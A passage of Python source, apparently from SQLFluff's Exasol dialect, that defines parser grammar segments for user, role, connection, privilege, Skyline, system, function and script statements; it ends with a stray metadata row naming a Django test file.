# EXPORT valid: REPLACE, TRUNCATE, ENCODING, NULL, BOOLEAN, ROW SEPARATOR
# COLUMN SEPARATOR / DELIMITER, DELIMIT, WITH COLUMN NAMES
"ENCODING",
"NULL",
"BOOLEAN",
Sequence("ROW", "SEPARATOR"),
Sequence(
"COLUMN",
OneOf("SEPARATOR", "DELIMITER"),
),
Ref("EqualsSegment"),
Ref("QuotedLiteralSegment"),
),
OneOf("TRIM", "LTRIM", "RTRIM"),
Sequence(
OneOf(
"SKIP",
Sequence("ROW", "SIZE"),
),
Ref("EqualsSegment"),
Ref("NumericLiteralSegment"),
),
"REPLACE",
"TRUNCATE",
Sequence(
"WITH",
"COLUMN",
"NAMES",
),
Sequence(
# EXPORT only
"DELIMIT",
Ref("EqualsSegment"),
OneOf("ALWAYS", "NEVER", "AUTO"),
),
)
############################
# USER
############################
@exasol_dialect.segment()
class CreateUserSegment(BaseSegment):
"""`CREATE USER` statement.
https://docs.exasol.com/sql/create_user.htm
"""
type = "create_user"
is_ddl = False
is_dml = False
is_dql = False
is_dcl = True
match_grammar = StartsWith(
Sequence("CREATE", "USER"),
)
parse_grammar = Sequence(
"CREATE",
"USER",
Ref("NakedIdentifierSegment"),
"IDENTIFIED",
OneOf(
Ref("UserPasswordAuthSegment"),
Ref("UserKerberosAuthSegment"),
Ref("UserLDAPAuthSegment"),
),
)
@exasol_dialect.segment()
class AlterUserSegment(BaseSegment):
"""`ALTER USER` statement.
https://docs.exasol.com/sql/alter_user.htm
"""
type = "alter_user"
is_ddl = False
is_dml = False
is_dql = False
is_dcl = True
match_grammar = StartsWith(
Sequence("ALTER", "USER"),
)
parse_grammar = Sequence(
"ALTER",
"USER",
Ref("NakedIdentifierSegment"),
OneOf(
Sequence(
"IDENTIFIED",
OneOf(
Sequence(
Ref("UserPasswordAuthSegment"),
Sequence(
"REPLACE",
Ref("QuotedIdentifierSegment"),
optional=True,
),
),
Ref("UserLDAPAuthSegment"),
Ref("UserKerberosAuthSegment"),
),
),
Sequence(
"PASSWORD_EXPIRY_POLICY",
Ref("EqualsSegment"),
Ref("QuotedLiteralSegment"),
),
Sequence("PASSWORD", "EXPIRE"),
Sequence("RESET", "FAILED", "LOGIN", "ATTEMPTS"),
Sequence(
"SET",
"CONSUMER_GROUP",
Ref("EqualsSegment"),
OneOf(Ref("NakedIdentifierSegment"), "NULL"),
),
),
)
@exasol_dialect.segment()
class UserPasswordAuthSegment(BaseSegment):
"""user password authentification."""
type = "password_auth"
match_grammar = Sequence(
# password
"BY",
Ref("QuotedIdentifierSegment"),
)
@exasol_dialect.segment()
class UserKerberosAuthSegment(BaseSegment):
"""user kerberos authentification."""
type = "kerberos_auth"
match_grammar = StartsWith(Sequence("BY", "KERBEROS"))
parse_grammar = Sequence(
"BY",
"KERBEROS",
"PRINCIPAL",
Ref("QuotedLiteralSegment"),
)
@exasol_dialect.segment()
class UserLDAPAuthSegment(BaseSegment):
"""user ldap authentification."""
type = "ldap_auth"
match_grammar = StartsWith(Sequence("AT", "LDAP"))
parse_grammar = Sequence(
"AT",
"LDAP",
"AS",
Ref("QuotedLiteralSegment"),
Ref.keyword("FORCE", optional=True),
)
############################
# CONSUMER GROUP
############################
@exasol_dialect.segment()
class CreateConsumerGroupSegment(BaseSegment):
"""`CREATE CONSUMER GROUP` statement."""
type = "create_consumer_group_statement"
match_grammar = Sequence(
"CREATE",
"CONSUMER",
"GROUP",
Ref("NakedIdentifierSegment"),
"WITH",
Delimited(Ref("ConsumerGroupParameterSegment")),
)
@exasol_dialect.segment()
class AlterConsumerGroupSegment(BaseSegment):
"""`ALTER CONSUMER GROUP` statement."""
type = "alter_consumer_group_statement"
match_grammar = Sequence(
"ALTER",
"CONSUMER",
"GROUP",
Ref("NakedIdentifierSegment"),
"SET",
Delimited(Ref("ConsumerGroupParameterSegment")),
)
@exasol_dialect.segment()
class ConsumerGroupParameterSegment(BaseSegment):
"""Consumer Group Parameters."""
type = "consumer_group_parameter"
match_grammar = Sequence(
OneOf(
"CPU_WEIGHT",
"PRECEDENCE",
"GROUP_TEMP_DB_RAM_LIMIT",
"USER_TEMP_DB_RAM_LIMIT",
"SESSION_TEMP_DB_RAM_LIMIT",
),
Ref("EqualsSegment"),
OneOf(Ref("QuotedLiteralSegment"), Ref("NumericLiteralSegment")),
)
############################
# ROLE
############################
@exasol_dialect.segment()
class CreateRoleSegment(BaseSegment):
"""`CREATE ROLE` statement.
https://docs.exasol.com/sql/create_role.htm
"""
type = "create_role"
is_ddl = False
is_dml = False
is_dql = False
is_dcl = True
match_grammar = StartsWith(
Sequence("CREATE", "ROLE"),
)
parse_grammar = Sequence(
"CREATE",
"ROLE",
Ref("NakedIdentifierSegment"),
)
@exasol_dialect.segment()
class AlterRoleSegment(BaseSegment):
"""`ALTER ROLE` statement.
Only allowed to alter CONSUMER GROUPs
"""
type = "alter_role"
is_ddl = False
is_dml = False
is_dql = False
is_dcl = True
match_grammar = StartsWith(
Sequence("ALTER", "ROLE"),
)
parse_grammar = Sequence(
"ALTER",
"ROLE",
Ref("NakedIdentifierSegment"),
"SET",
Sequence(
"CONSUMER_GROUP",
Ref("EqualsSegment"),
OneOf(Ref("NakedIdentifierSegment"), "NULL"),
),
)
############################
# CONNECTION
############################
@exasol_dialect.segment()
class CreateConnectionSegment(BaseSegment):
"""`CREATE CONNECTION` statement.
https://docs.exasol.com/sql/create_connection.htm
"""
type = "create_connection"
is_ddl = False
is_dml = False
is_dql = False
is_dcl = True
match_grammar = StartsWith(
Sequence("CREATE", Ref("OrReplaceGrammar", optional=True), "CONNECTION"),
)
parse_grammar = Sequence(
"CREATE",
Ref("OrReplaceGrammar", optional=True),
"CONNECTION",
Ref("NakedIdentifierSegment"),
"TO",
Ref("ConnectionDefinition"),
)
@exasol_dialect.segment()
class AlterConnectionSegment(BaseSegment):
"""`ALTER CONNECTION` statement.
https://docs.exasol.com/sql/alter_connection.htm
"""
type = "alter_connection"
is_ddl = False
is_dml = False
is_dql = False
is_dcl = True
match_grammar = StartsWith(
Sequence("ALTER", "CONNECTION"),
)
parse_grammar = Sequence(
"ALTER",
"CONNECTION",
Ref("NakedIdentifierSegment"),
"TO",
Ref("ConnectionDefinition"),
)
@exasol_dialect.segment()
class ConnectionDefinition(BaseSegment):
"""Definition of a connection."""
type = "connection_definition"
match_grammar = Sequence(
OneOf(
# string or identifier
Ref("SingleIdentifierGrammar"),
Ref("QuotedLiteralSegment"),
),
Sequence(
"USER",
Ref("QuotedLiteralSegment"),
"IDENTIFIED",
"BY",
Ref("QuotedLiteralSegment"),
optional=True,
),
)
############################
# GRANT / REVOKE
############################
@exasol_dialect.segment(replace=True)
class AccessStatementSegment(BaseSegment):
"""`GRANT` / `REVOKE` statement.
https://docs.exasol.com/sql/grant.htm
https://docs.exasol.com/sql/revoke.htm
"""
type = "access_statement"
is_ddl = False
is_dml = False
is_dql = False
is_dcl = True
match_grammar = StartsWith(
OneOf("GRANT", "REVOKE"),
)
parse_grammar = Sequence(
OneOf("GRANT", "REVOKE"),
OneOf(
Ref("GrantRevokeSystemPrivilegesSegment"),
Ref("GrantRevokeObjectPrivilegesSegment"),
Ref("GrantRevokeRolesSegment"),
Ref("GrantRevokeImpersonationSegment"),
Ref("GrantRevokeConnectionSegment"),
Ref("GrantRevokeConnectionRestrictedSegment"),
),
)
@exasol_dialect.segment()
class GrantRevokeSystemPrivilegesSegment(BaseSegment):
"""`GRANT` / `REVOKE` system privileges."""
type = "grant_revoke_system_privileges"
match_grammar = Sequence(
OneOf(
Sequence(
"ALL",
Ref.keyword(
"PRIVILEGES",
optional=True,
),
),
Delimited(
Ref("SystemPrivilegesSegment"),
terminator=OneOf("TO", "FROM"),
),
),
OneOf("TO", "FROM"),
Delimited(
Ref("NakedIdentifierSegment"),
),
Sequence("WITH", "ADMIN", "OPTION", optional=True), # Grant only
)
@exasol_dialect.segment()
class GrantRevokeObjectPrivilegesSegment(BaseSegment):
"""`GRANT` / `REVOKE` object privileges."""
type = "grant_revoke_object_privileges"
match_grammar = Sequence(
OneOf(
Sequence("ALL", Ref.keyword("PRIVILEGES", optional=True)),
Delimited(Ref("ObjectPrivilegesSegment"), terminator="ON"),
),
"ON",
OneOf(
OneOf("SCHEMA", "TABLE", "VIEW", "FUNCTION", "SCRIPT"),
Sequence("ALL", Ref.keyword("OBJECTS", optional=True)), # Revoke only
optional=True,
),
Ref("ObjectReferenceSegment"),
OneOf(
Sequence( # Grant only
"TO",
Delimited(Ref("NakedIdentifierSegment")),
),
Sequence( # Revoke only
"FROM",
Delimited(Ref("NakedIdentifierSegment")),
Sequence("CASCADE", "CONSTRAINTS", optional=True),
),
),
)
@exasol_dialect.segment()
class GrantRevokeRolesSegment(BaseSegment):
"""`GRANT` / `REVOKE` roles."""
type = "grant_revoke_roles"
match_grammar = Sequence(
OneOf(
Sequence("ALL", "ROLES"), # Revoke only
Delimited(Ref("NakedIdentifierSegment"), terminator=OneOf("TO", "FROM")),
),
OneOf("TO", "FROM"),
Delimited(Ref("NakedIdentifierSegment")),
Sequence("WITH", "ADMIN", "OPTION", optional=True), # Grant only
)
@exasol_dialect.segment()
class GrantRevokeImpersonationSegment(BaseSegment):
"""`GRANT` / `REVOKE` impersonation."""
type = "grant_revoke_impersonation"
match_grammar = Sequence(
"IMPERSONATION",
"ON",
Delimited(
Ref("NakedIdentifierSegment"),
terminator=OneOf("TO", "FROM"),
),
OneOf("TO", "FROM"),
Delimited(Ref("NakedIdentifierSegment")),
)
@exasol_dialect.segment()
class GrantRevokeConnectionSegment(BaseSegment):
"""`GRANT` / `REVOKE` connection."""
type = "grant_revoke_connection"
match_grammar = Sequence(
"CONNECTION",
Delimited(
Ref("NakedIdentifierSegment"),
terminator=OneOf("TO", "FROM"),
),
OneOf("TO", "FROM"),
Delimited(Ref("NakedIdentifierSegment")),
Sequence("WITH", "ADMIN", "OPTION", optional=True),
)
@exasol_dialect.segment()
class GrantRevokeConnectionRestrictedSegment(BaseSegment):
"""`GRANT` / `REVOKE` connection restricted."""
type = "grant_revoke_connection_restricted"
match_grammar = Sequence(
"ACCESS",
"ON",
"CONNECTION",
Ref("NakedIdentifierSegment"),
Sequence(
"FOR",
OneOf("SCRIPT", "SCHEMA", optional=True),
Ref("NakedIdentifierSegment"),
),
OneOf("TO", "FROM"),
Delimited(Ref("NakedIdentifierSegment")),
)
@exasol_dialect.segment()
class SystemPrivilegesSegment(BaseSegment):
"""System privileges.
https://docs.exasol.com/database_concepts/privileges/details_rights_management.htm#System_Privileges
"""
type = "system_privilege"
match_grammar = OneOf(
Sequence("GRANT", "ANY", "OBJECT", "PRIVILEGE"),
Sequence("GRANT", "ANY", "PRIVILEGE"),
Sequence("SET", "ANY", "CONSUMER", "GROUP"),
Sequence("MANAGE", "CONSUMER", "GROUPS"),
Sequence("KILL", "ANY", "SESSION"),
Sequence("ALTER", "SYSTEM"),
Sequence(OneOf("CREATE", "ALTER", "DROP"), "USER"),
Sequence("IMPERSONATE", "ANY", "USER"),
Sequence(OneOf("DROP", "GRANT"), "ANY", "ROLE"),
Sequence(OneOf("ALTER", "DROP", "GRANT", "USE", "ACCESS"), "ANY", "CONNECTION"),
Sequence("CREATE", Ref.keyword("VIRTUAL", optional=True), "SCHEMA"),
Sequence(
OneOf("ALTER", "DROP", "USE"),
"ANY",
Ref.keyword("VIRTUAL", optional=True),
"SCHEMA",
Ref.keyword("REFRESH", optional=True),
),
Sequence(
"CREATE",
OneOf(
"TABLE", "VIEW", "CONNECTION", "ROLE", "SESSION", "FUNCTION", "SCRIPT"
),
),
Sequence(
OneOf("CREATE", "ALTER", "DELETE", "DROP", "INSERT", "SELECT", "UPDATE"),
"ANY",
"TABLE",
),
Sequence("SELECT", "ANY", "DICTIONARY"),
Sequence(OneOf("CREATE", "DROP"), "ANY", "VIEW"),
Sequence(
OneOf("CREATE", "DROP", "EXECUTE"), "ANY", OneOf("SCRIPT", "FUNCTION")
),
"IMPORT",
"EXPORT",
)
@exasol_dialect.segment()
class ObjectPrivilegesSegment(BaseSegment):
"""Object privileges.
https://docs.exasol.com/database_concepts/privileges/details_rights_management.htm#System_Privileges
"""
type = "object_privilege"
match_grammar = OneOf(
"ALTER",
"SELECT",
"INSERT",
"UPDATE",
"DELETE",
"REFERENCES",
"EXECUTE",
# Revoke only
"IMPORT",
"EXPORT",
)
############################
# SKYLINE
############################
@exasol_dialect.segment()
class PreferringClauseSegment(BaseSegment):
"""`PREFERRING` clause of the Exasol Skyline extension.
https://docs.exasol.com/advanced_analytics/skyline.htm#preferring_clause
"""
type = "preferring_clause"
match_grammar = StartsWith(
"PREFERRING",
terminator=OneOf(
"LIMIT",
Sequence("GROUP", "BY"),
Sequence("ORDER", "BY"),
"HAVING",
"QUALIFY",
Ref("SetOperatorSegment"),
),
)
parse_grammar = Sequence(
"PREFERRING",
OptionallyBracketed(Ref("PreferringPreferenceTermSegment")),
Ref("PartitionClauseSegment", optional=True),
)
@exasol_dialect.segment()
class PreferringPreferenceTermSegment(BaseSegment):
"""The preference term of a `PREFERRING` clause."""
type = "preference_term"
match_grammar = Sequence(
OneOf(
Sequence(
OneOf("HIGH", "LOW"),
OneOf(
Ref("LiteralGrammar"),
Ref("BareFunctionSegment"),
Ref("FunctionSegment"),
Ref("ColumnReferenceSegment"),
),
),
OneOf(
Ref("LiteralGrammar"),
Ref("BareFunctionSegment"),
Ref("FunctionSegment"),
Ref("ColumnReferenceSegment"),
),
),
Ref("PreferringPlusPriorTermSegment", optional=True),
)
@exasol_dialect.segment()
class PreferringPlusPriorTermSegment(BaseSegment):
"""The `PLUS` / `PRIOR TO` or `INVERSE` term within a preferring preference term expression."""
type = "plus_prior_inverse"
match_grammar = OneOf(
Sequence(
Sequence(
OneOf(
"PLUS",
Sequence("PRIOR", "TO"),
),
Ref("PreferringPreferenceTermSegment"),
optional=True,
),
),
Sequence(
"INVERSE",
Ref("PreferringPreferenceTermSegment"),
),
)
@exasol_dialect.segment(replace=True)
class MLTableExpressionSegment(BaseSegment):
"""Not supported."""
match_grammar = Nothing()
############################
# SYSTEM
############################
@exasol_dialect.segment()
class AlterSessionSegment(BaseSegment):
"""`ALTER SESSION` statement."""
type = "alter_session_statement"
match_grammar = Sequence(
"ALTER",
"SESSION",
"SET",
Ref("SessionParameterSegment"),
Ref("EqualsSegment"),
OneOf(Ref("QuotedLiteralSegment"), Ref("NumericLiteralSegment")),
)
@exasol_dialect.segment()
class AlterSystemSegment(BaseSegment):
"""`ALTER SYSTEM` statement."""
type = "alter_system_statement"
match_grammar = Sequence(
"ALTER",
"SYSTEM",
"SET",
Ref("SystemParameterSegment"),
Ref("EqualsSegment"),
OneOf(Ref("QuotedLiteralSegment"), Ref("NumericLiteralSegment")),
)
@exasol_dialect.segment()
class OpenSchemaSegment(BaseSegment):
"""`OPEN SCHEMA` statement."""
type = "open_schema_statement"
match_grammar = Sequence("OPEN", "SCHEMA", Ref("SchemaReferenceSegment"))
@exasol_dialect.segment()
class CloseSchemaSegment(BaseSegment):
"""`CLOSE SCHEMA` statement."""
type = "close_schema_statement"
match_grammar = Sequence("CLOSE", "SCHEMA")
@exasol_dialect.segment()
class FlushStatisticsSegment(BaseSegment):
"""`FLUSH STATISTICS` statement."""
type = "flush_statistics_statement"
match_grammar = Sequence("FLUSH", "STATISTICS")
@exasol_dialect.segment()
class RecompressReorganizeSegment(BaseSegment):
"""`RECOMPRESS` and `REOGRANIZE` statement."""
type = "recompress_reorganize_statement"
match_grammar = Sequence(
OneOf("RECOMPRESS", "REORGANIZE"),
OneOf(
Sequence(
"TABLE",
Ref("TableReferenceSegment"),
Ref("BracketedColumnReferenceListGrammar"),
),
Sequence("TABLES", Delimited(Ref("TableReferenceSegment"))),
Sequence("SCHEMA", Ref("SchemaReferenceSegment")),
Sequence("SCHEMAS", Delimited(Ref("SchemaReferenceSegment"))),
"DATABASE",
),
Ref.keyword("ENFORCE", optional=True),
)
@exasol_dialect.segment()
class PreloadSegment(BaseSegment):
"""`PRELOAD` statement."""
type = "preload_statement"
match_grammar = Sequence(
"PRELOAD",
OneOf(
Sequence(
"TABLE",
Ref("TableReferenceSegment"),
Ref("BracketedColumnReferenceListGrammar"),
),
Sequence("TABLES", Delimited(Ref("TableReferenceSegment"))),
Sequence("SCHEMA", Ref("SchemaReferenceSegment")),
Sequence("SCHEMAS", Delimited(Ref("SchemaReferenceSegment"))),
"DATABASE",
),
)
@exasol_dialect.segment()
class ImpersonateSegment(BaseSegment):
"""`IMPERSONATE` statement."""
type = "impersonate_statement"
match_grammar = Sequence("IMPERSONATE", Ref("SingleIdentifierGrammar"))
@exasol_dialect.segment()
class KillSegment(BaseSegment):
"""`KILL` statement."""
type = "kill_statement"
match_grammar = StartsWith("KILL")
parse_grammar = Sequence(
"KILL",
OneOf(
Sequence("SESSION", OneOf("CURRENT_SESSION", Ref("NumericLiteralSegment"))),
Sequence(
"STATEMENT",
Ref("NumericLiteralSegment", optional=True),
"IN",
"SESSION",
Ref("NumericLiteralSegment"),
Sequence("WITH", "MESSAGE", Ref("QuotedLiteralSegment"), optional=True),
),
),
)
@exasol_dialect.segment()
class TruncateAuditLogsSegment(BaseSegment):
"""`TRUNCATE AUDIT LOGS` statement."""
type = "truncate_audit_logs_statement"
match_grammar = StartsWith(Sequence("TRUNCATE", "AUDIT", "LOGS"))
parse_grammar = Sequence(
"TRUNCATE",
"AUDIT",
"LOGS",
Sequence(
"KEEP",
OneOf(
Sequence("LAST", OneOf("DAY", "MONTH", "YEAR")),
Sequence("FROM", Ref("QuotedLiteralSegment")),
),
optional=True,
),
)
############################
# OTHERS
############################
@exasol_dialect.segment(replace=True)
class TransactionStatementSegment(BaseSegment):
"""A `COMMIT` or `ROLLBACK` statement."""
type = "transaction_statement"
match_grammar = Sequence(
OneOf("COMMIT", "ROLLBACK"), Ref.keyword("WORK", optional=True)
)
@exasol_dialect.segment()
class ExecuteScriptSegment(BaseSegment):
"""`EXECUTE SCRIPT` statement."""
type = "execute_script_statement"
match_grammar = Sequence(
"EXECUTE",
"SCRIPT",
Ref("ScriptReferenceSegment"),
Bracketed(
Delimited(Ref.keyword("ARRAY", optional=True), Ref("ExpressionSegment")),
optional=True,
),
Sequence("WITH", "OUTPUT", optional=True),
)
@exasol_dialect.segment()
class ExplainVirtualSegment(BaseSegment):
"""`EXPLAIN VIRTUAL` statement."""
type = "explain_virtual_statement"
match_grammar = Sequence("EXPLAIN", "VIRTUAL", Ref("SelectableGrammar"))
############################
# FUNCTION
############################
@exasol_dialect.segment()
class FunctionReferenceSegment(exasol_dialect.get_segment("ObjectReferenceSegment")): # type: ignore
"""A reference to a function."""
type = "function_reference"
@exasol_dialect.segment(replace=True)
class CreateFunctionStatementSegment(BaseSegment):
"""A `CREATE FUNCTION` statement."""
type = "create_function_statement"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = StartsWith(
Sequence(
"CREATE",
Ref("OrReplaceGrammar", optional=True),
"FUNCTION",
),
terminator=Ref("FunctionScriptTerminatorSegment"),
)
parse_grammar = Sequence(
"CREATE",
Ref("OrReplaceGrammar", optional=True),
"FUNCTION",
Ref("FunctionReferenceSegment"),
Bracketed(
Delimited(
Sequence(
Ref("SingleIdentifierGrammar"), # Column name
Ref.keyword("IN", optional=True),
Ref("DatatypeSegment"), # Column type
),
optional=True,
),
),
"RETURN",
Ref("DatatypeSegment"),
OneOf("IS", "AS", optional=True),
AnyNumberOf(
Sequence(
Ref("VariableNameSegment"),
Ref("DatatypeSegment"),
Ref("DelimiterSegment"),
),
optional=True,
),
"BEGIN",
AnyNumberOf(Ref("FunctionBodySegment")),
"RETURN",
Ref("FunctionContentsExpressionGrammar"),
Ref("DelimiterSegment"),
"END",
Ref("FunctionReferenceSegment", optional=True),
Ref("SemicolonSegment", optional=True),
)
@exasol_dialect.segment()
class FunctionBodySegment(BaseSegment):
"""The definition of the function body."""
type = "function_body"
match_grammar = OneOf(
Ref("FunctionAssignmentSegment"),
Ref("FunctionIfBranchSegment"),
Ref("FunctionForLoopSegment"),
Ref("FunctionWhileLoopSegment"),
)
@exasol_dialect.segment()
class FunctionAssignmentSegment(BaseSegment):
"""The definition of a assignment within a function body."""
type = "function_assignment"
match_grammar = Sequence(
# assignment
Ref("VariableNameSegment"),
Ref("WalrusOperatorSegment"),
OneOf(
Ref("FunctionSegment"),
Ref("VariableNameSegment"),
Ref("LiteralGrammar"),
Ref("ExpressionSegment"),
),
Ref("SemicolonSegment"),
)
@exasol_dialect.segment()
class FunctionIfBranchSegment(BaseSegment):
"""The definition of a if branch within a function body."""
type = "function_if_branch"
match_grammar = Sequence(
"IF",
AnyNumberOf(Ref("ExpressionSegment")),
"THEN",
AnyNumberOf(Ref("FunctionBodySegment"), min_times=1),
AnyNumberOf(
Sequence(
OneOf("ELSIF", "ELSEIF"),
Ref("ExpressionSegment"),
"THEN",
AnyNumberOf(Ref("FunctionBodySegment"), min_times=1),
),
optional=True,
),
Sequence(
"ELSE", AnyNumberOf(Ref("FunctionBodySegment"), min_times=1), optional=True
),
"END",
"IF",
Ref("SemicolonSegment"),
)
@exasol_dialect.segment()
class FunctionForLoopSegment(BaseSegment):
"""The definition of a for loop within a function body."""
type = "function_for_loop"
match_grammar = Sequence(
"FOR",
Ref("NakedIdentifierSegment"),
OneOf(
# # for x := 1 to 10 do...
Sequence(
Ref("WalrusOperatorSegment"),
Ref("ExpressionSegment"), # could be a variable
"TO",
Ref("ExpressionSegment"), # could be a variable
"DO",
AnyNumberOf(Ref("FunctionBodySegment"), min_times=1),
"END",
"FOR",
),
# for x IN 1..10...
Sequence(
"IN",
Ref("ExpressionSegment"), # could be a variable
Ref("RangeOperator"),
Ref("ExpressionSegment"), # could be a variable
"LOOP",
AnyNumberOf(Ref("FunctionBodySegment"), min_times=1),
"END",
"LOOP",
),
),
Ref("SemicolonSegment"),
)
@exasol_dialect.segment()
class FunctionWhileLoopSegment(BaseSegment):
"""The definition of a while loop within a function body."""
type = "function_while_loop"
match_grammar = Sequence(
"WHILE",
Ref("ExpressionSegment"),
"DO",
AnyNumberOf(Ref("FunctionBodySegment"), min_times=1),
"END",
"WHILE",
Ref("SemicolonSegment"),
)
@exasol_dialect.segment(replace=True)
class FunctionSegment(BaseSegment):
"""A scalar or aggregate function.
Maybe in the future we should distinguish between
aggregate functions and other functions. For now
we treat them the same because they look the same
for our purposes.
"""
type = "function"
match_grammar = OneOf(
Sequence(
Sequence(
Ref("DatePartFunctionNameSegment"),
Bracketed(
Ref(
"FunctionContentsGrammar",
# The brackets might be empty for some functions...
optional=True,
ephemeral_name="FunctionContentsGrammar",
),
),
),
Ref("PostFunctionGrammar", optional=True),
),
Sequence(
Sequence(
AnyNumberOf(
Ref("FunctionNameSegment"),
max_times=1,
min_times=1,
exclude=Ref("DatePartFunctionNameSegment"),
),
Bracketed(
Ref(
"FunctionContentsGrammar",
# The brackets might be empty for some functions...
optional=True,
ephemeral_name="FunctionContentsGrammar",
)
),
),
Ref("PostFunctionGrammar", optional=True),
),
)
@exasol_dialect.segment(replace=True)
class DatePartFunctionNameSegment(BaseSegment):
"""DATEADD function name segment.
Need to be able to specify this as type function_name
so that linting rules identify it properly
"""
type = "function_name"
match_grammar = OneOf(
"ADD_DAYS",
"ADD_HOURS",
"ADD_MINUTES",
"ADD_MONTHS",
"ADD_SECONDS",
"ADD_WEEKS",
"ADD_YEARS",
)
############################
# SCRIPT
############################
@exasol_dialect.segment()
class ScriptReferenceSegment(exasol_dialect.get_segment("ObjectReferenceSegment")): # type: ignore
"""A reference to a script."""
type = "script_reference"
@exasol_dialect.segment()
class ScriptContentSegment(BaseSegment):
"""This represents the script content.
Because the script content could be written in
LUA, PYTHON, JAVA or R there is no further verification.
"""
type = "script_content"
match_grammar = Anything()
@exasol_dialect.segment()
class CreateScriptingLuaScriptStatementSegment(BaseSegment):
"""`CREATE SCRIPT` statement to create a Lua scripting script.
https://docs.exasol.com/sql/create_script.htm
"""
type = "create_scripting_lua_script"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = StartsWith(
Sequence(
"CREATE",
Ref("OrReplaceGrammar", optional=True),
Ref.keyword("LUA", optional=True),
"SCRIPT",
),
terminator=Ref("FunctionScriptTerminatorSegment"),
)
parse_grammar = Sequence(
"CREATE",
Ref("OrReplaceGrammar", optional=True),
Ref.keyword("LUA", optional=True),
"SCRIPT",
Ref("ScriptReferenceSegment"),
Bracketed(
Delimited(
Sequence(
Ref.keyword("ARRAY", optional=True), Ref("SingleIdentifierGrammar")
),
optional=True,
),
optional=True,
),
Sequence(Ref.keyword("RETURNS"), OneOf("TABLE", "ROWCOUNT"), optional=True),
"AS",
Indent,
Ref("ScriptContentSegment"),
Dedent,
)
@exasol_dialect.segment()
class CreateUDFScriptStatementSegment(BaseSegment):
"""`CREATE SCRIPT` statement create a UDF script.
https://docs.exasol.com/sql/create_script.htm
"""
type = "create_udf_script"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = StartsWith(
Sequence(
"CREATE",
Ref("OrReplaceGrammar", optional=True),
OneOf(
"JAVA",
"PYTHON",
"LUA",
"R",
Ref("SingleIdentifierGrammar"),
optional=True,
),
OneOf("SCALAR", "SET"),
"SCRIPT",
)
)
parse_grammar = Sequence(
"CREATE",
Ref("OrReplaceGrammar", optional=True),
OneOf(
"JAVA", "PYTHON", "LUA", "R", Ref("SingleIdentifierGrammar"), optional=True
),
OneOf("SCALAR", "SET"),
"SCRIPT",
Ref("ScriptReferenceSegment"),
Bracketed(
Sequence(
Ref("UDFParameterGrammar"),
Ref("OrderByClauseSegment", optional=True),
optional=True,
),
),
OneOf(Sequence("RETURNS", Ref("DatatypeSegment")), Ref("EmitsGrammar")),
"AS",
Indent,
Ref("ScriptContentSegment"),
Dedent,
)
@exasol_dialect.segment()
class CreateAdapterScriptStatementSegment(BaseSegment):
"""`CREATE SCRIPT` statement create a adapter script.
https://docs.exasol.com/sql/create_script.htm
"""
type = "create_adapter_script"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = StartsWith(
Sequence(
"CREATE",
Ref("OrReplaceGrammar", optional=True),
OneOf("JAVA", "PYTHON", Ref("SingleIdentifierGrammar"), optional=True),
"ADAPTER",
"SCRIPT",
)
)
parse_grammar = Sequence(
"CREATE",
Ref("OrReplaceGrammar", optional=True),
OneOf("JAVA", "PYTHON", Ref("SingleIdentifierGrammar"), optional=True),
"ADAPTER",
"SCRIPT",
Ref("ScriptReferenceSegment"),
"AS",
Indent,
Ref("ScriptContentSegment"),
Dedent,
)
############################
# DIALECT
############################
@exasol_dialect.segment()
class FunctionScriptStatementSegment(BaseSegment):
"""A generic segment, to any of its child subsegments."""
type = "statement"
match_grammar = OneOf(
Ref("CreateFunctionStatementSegment"),
Ref("CreateScriptingLuaScriptStatementSegment"),
Ref("CreateUDFScriptStatementSegment"),
Ref("CreateAdapterScriptStatementSegment"),
)
@exasol_dialect.segment(replace=True)
class StatementSegment(BaseSegment):
"""A generic segment, to any of its child subsegments."""
type = "statement"
match_grammar = GreedyUntil(Ref("SemicolonSegment"))
parse_grammar = OneOf(
# Data Query Language (DQL)
Ref("SelectableGrammar"),
# Data Modifying Language (DML)
Ref("DeleteStatementSegment"),
Ref("ExportStatementSegment"),
Ref("ImportStatementSegment"),
Ref("InsertStatementSegment"),
Ref("MergeStatementSegment"),
Ref("TruncateStatementSegment"),
Ref("UpdateStatementSegment"),
# Data Definition Language (DDL)
Ref("AlterTableStatementSegment"),
Ref("AlterSchemaStatementSegment"),
Ref("AlterVirtualSchemaStatementSegment"),
Ref("CommentStatementSegment"),
Ref("CreateSchemaStatementSegment"),
Ref("CreateTableStatementSegment"),
Ref("CreateViewStatementSegment"),
Ref("CreateVirtualSchemaStatementSegment"),
Ref("DropStatementSegment"),
Ref("RenameStatementSegment"),
# Access Control Language (DCL)
Ref("AccessStatementSegment"),
Ref("AlterConnectionSegment"),
Ref("AlterUserSegment"),
Ref("CreateConnectionSegment"),
Ref("CreateRoleSegment"),
Ref("CreateUserSegment"),
# System
Ref("CreateConsumerGroupSegment"),
Ref("AlterConsumerGroupSegment"),
Ref("AlterRoleSegment"),
Ref("AlterSessionSegment"),
Ref("AlterSystemSegment"),
Ref("OpenSchemaSegment"),
Ref("CloseSchemaSegment"),
Ref("FlushStatisticsSegment"),
Ref("ImpersonateSegment"),
Ref("RecompressReorganizeSegment"),
Ref("KillSegment"),
Ref("PreloadSegment"),
Ref("TruncateAuditLogsSegment"),
Ref("ExplainVirtualSegment"),
# Others
Ref("TransactionStatementSegment"),
Ref("ExecuteScriptSegment"),
)
@exasol_dialect.segment(replace=True)
class FileSegment(BaseFileSegment):
"""This overwrites the FileSegment from ANSI.
The reason is because SCRIPT and FUNCTION statements
are terminated by a trailing / at the end.
A semicolon is the terminator of the statement within the function / script
"""
parse_grammar = AnyNumberOf(
Delimited(
Ref("FunctionScriptStatementSegment"),
delimiter=Ref("FunctionScriptTerminatorSegment"),
allow_gaps=True,
allow_trailing=True,
),
Delimited(
Ref("StatementSegment"),
delimiter=Ref("DelimiterSegment"),
allow_gaps=True,
allow_trailing=True,
),
)
| 27.545722 | 107 | 0.544549 |
95bb8eddb28a6ef920ed62f599ee10b3e6c61265 | 8,690 | py | Python | tests/forms_tests/widget_tests/test_checkboxselectmultiple.py | peteralexandercharles/django | 61c7350f41f2534daf3888709f3c987b7d779a29 | [
"BSD-3-Clause",
"0BSD"
] | null | null | null | tests/forms_tests/widget_tests/test_checkboxselectmultiple.py | peteralexandercharles/django | 61c7350f41f2534daf3888709f3c987b7d779a29 | [
"BSD-3-Clause",
"0BSD"
